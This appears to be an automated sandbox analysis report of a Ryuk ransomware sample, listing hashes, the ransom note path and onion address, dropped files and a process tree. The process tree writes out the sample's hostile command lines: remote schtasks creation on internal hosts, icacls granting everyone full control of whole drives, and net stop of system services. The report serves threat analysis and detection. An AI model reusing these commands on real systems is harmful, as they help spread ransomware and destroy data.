Analysis
-
max time kernel
109s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
17-03-2021 21:00
Static task
static1
Behavioral task
behavioral1
Sample
c68395e474088d5339972e2bf5a30f3c.bin.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
c68395e474088d5339972e2bf5a30f3c.bin.exe
Resource
win10v20201028
General
-
Target
c68395e474088d5339972e2bf5a30f3c.bin.exe
-
Size
119KB
-
MD5
c68395e474088d5339972e2bf5a30f3c
-
SHA1
502e42240969399c09337ecc7b5ca8fc1ba4baf3
-
SHA256
9eb7abf2228ad28d8b7f571e0495d4a35da40607f04355307077975e271553b8
-
SHA512
5320fe8144071dde940ebd0285e6fcf573d36c28ea51fca3b5aecc49bfe5ffcf25d1afbd294e0d0b565a3a621d5ea189b075d868bbef521f2e1fe6702e8be75a
Malware Config
Extracted
C:\users\Public\RyukReadMe.html
ryuk
http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Executes dropped EXE 3 IoCs
pid Process 3100 RQzkZQvytrep.exe 576 NRYCHQScalan.exe 1756 CWIOuEVhmlan.exe -
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 3648 icacls.exe 3816 icacls.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI c68395e474088d5339972e2bf5a30f3c.bin.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\ij c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ExcelCombinedFloatieModel.bin c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\NAMECONTROLPROXY.DLL c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_nb_135x40.svg c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close_h.png c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\ShapeCollector.exe.mui c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019DemoR_BypassTrial180-ul-oob.xrm-ms c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugin.js c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Internet Explorer\images\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Resources\1033\PowerPivotExcelClientAddIn.rll c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\ui-strings.js c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\ui-strings.js c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-100.png c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\gui\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\ui-strings.js c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons_ie8.gif c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\exportpdf-selector.js c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ul-oob.xrm-ms c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019VL_MAK_AE-ul-phn.xrm-ms c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\PREVIEW.GIF c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\help.svg c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\flags.png c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\de-de\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jfr.jar c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-ul-oob.xrm-ms c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\mscss7cm_en.dub c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ADO210.CHM c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\ui-strings.js c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Retail-ul-oob.xrm-ms c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\JOURNAL\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-tw\ui-strings.js c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\ui-strings.js c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\ui-strings.js c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\ui-strings.js c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\AppStore_icon.svg c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\uk-ua\ui-strings.js c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Grace-ppd.xrm-ms c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_K_COL.HXK c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN048.XML c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-pl.xrm-ms c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Grace-ppd.xrm-ms c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_nl_135x40.svg c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ul-phn.xrm-ms c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_KMS_Client-ppd.xrm-ms c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\ui-strings.js c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\deployed\jdk16\windows-amd64\RyukReadMe.html c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WEBSANDBOX.DLL c68395e474088d5339972e2bf5a30f3c.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png c68395e474088d5339972e2bf5a30f3c.bin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6048 schtasks.exe 1704 schtasks.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 4760 wrote to memory of 3100 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 78 PID 4760 wrote to memory of 3100 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 78 PID 4760 wrote to memory of 3100 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 78 PID 4760 wrote to memory of 576 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 79 PID 4760 wrote to memory of 576 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 79 PID 4760 wrote to memory of 576 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 79 PID 4760 wrote to memory of 1756 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 80 PID 4760 wrote to memory of 1756 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 80 PID 4760 wrote to memory of 1756 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 80 PID 4760 wrote to memory of 3648 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 81 PID 4760 wrote to memory of 3648 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 81 PID 4760 wrote to memory of 3648 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 81 PID 4760 wrote to memory of 3816 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 82 PID 4760 wrote to memory of 3816 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 82 PID 4760 wrote to memory of 3816 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 82 PID 4760 wrote to memory of 2960 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 85 PID 4760 wrote to memory of 2960 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 85 PID 4760 wrote to memory of 2960 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 85 PID 4760 wrote to memory of 2988 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 86 PID 4760 wrote to memory of 2988 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 86 PID 4760 wrote to memory of 2988 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 86 PID 4760 wrote to memory of 4008 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 90 PID 4760 wrote to memory of 4008 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 90 PID 4760 wrote to memory of 4008 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 90 PID 4760 wrote to memory of 4352 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 89 PID 4760 wrote to memory of 4352 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 89 PID 4760 wrote to memory of 4352 4760 c68395e474088d5339972e2bf5a30f3c.bin.exe 89 PID 2960 wrote to memory of 5272 2960 net.exe 93 PID 2960 wrote to memory of 5272 2960 net.exe 93 PID 2960 wrote to memory of 5272 2960 net.exe 93 PID 2988 wrote to memory of 5384 2988 net.exe 94 PID 2988 wrote to memory of 5384 2988 net.exe 94 PID 2988 wrote to memory of 5384 2988 net.exe 94 PID 4008 wrote to memory of 5468 4008 net.exe 95 PID 4008 wrote to memory of 5468 4008 net.exe 95 PID 4008 wrote to memory of 5468 4008 net.exe 95 PID 4352 wrote to memory of 5608 4352 net.exe 96 PID 4352 wrote to memory of 5608 4352 net.exe 96 PID 4352 wrote to memory of 5608 4352 net.exe 96 PID 3100 wrote to memory of 6048 3100 RQzkZQvytrep.exe 98 PID 3100 wrote to memory of 6048 3100 RQzkZQvytrep.exe 98 PID 3100 wrote to memory of 6048 3100 RQzkZQvytrep.exe 98 PID 3100 wrote to memory of 1704 3100 RQzkZQvytrep.exe 99 PID 3100 wrote to memory of 1704 3100 RQzkZQvytrep.exe 99 PID 3100 wrote to memory of 1704 3100 RQzkZQvytrep.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\c68395e474088d5339972e2bf5a30f3c.bin.exe"C:\Users\Admin\AppData\Local\Temp\c68395e474088d5339972e2bf5a30f3c.bin.exe"1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\RQzkZQvytrep.exe"C:\Users\Admin\AppData\Local\Temp\RQzkZQvytrep.exe" 9 REP2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.90 /TN 9ZZtJ32 /TR "C:\Users\Public\RQzkZQvytrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:6048
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.64 /TN lzC1Rnc /TR "C:\Users\Public\RQzkZQvytrep.exe" /sc once /st 00:00 /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1704
-
-
-
C:\Users\Admin\AppData\Local\Temp\NRYCHQScalan.exe"C:\Users\Admin\AppData\Local\Temp\NRYCHQScalan.exe" 8 LAN2⤵
- Executes dropped EXE
PID:576
-
-
C:\Users\Admin\AppData\Local\Temp\CWIOuEVhmlan.exe"C:\Users\Admin\AppData\Local\Temp\CWIOuEVhmlan.exe" 8 LAN2⤵
- Executes dropped EXE
PID:1756
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3648
-
-
C:\Windows\SysWOW64\icacls.exeicacls "D:\*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3816
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "audioendpointbuilder" /y3⤵PID:5272
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "audioendpointbuilder" /y3⤵PID:5384
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "samss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "samss" /y3⤵PID:5608
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "samss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "samss" /y3⤵PID:5468
-
-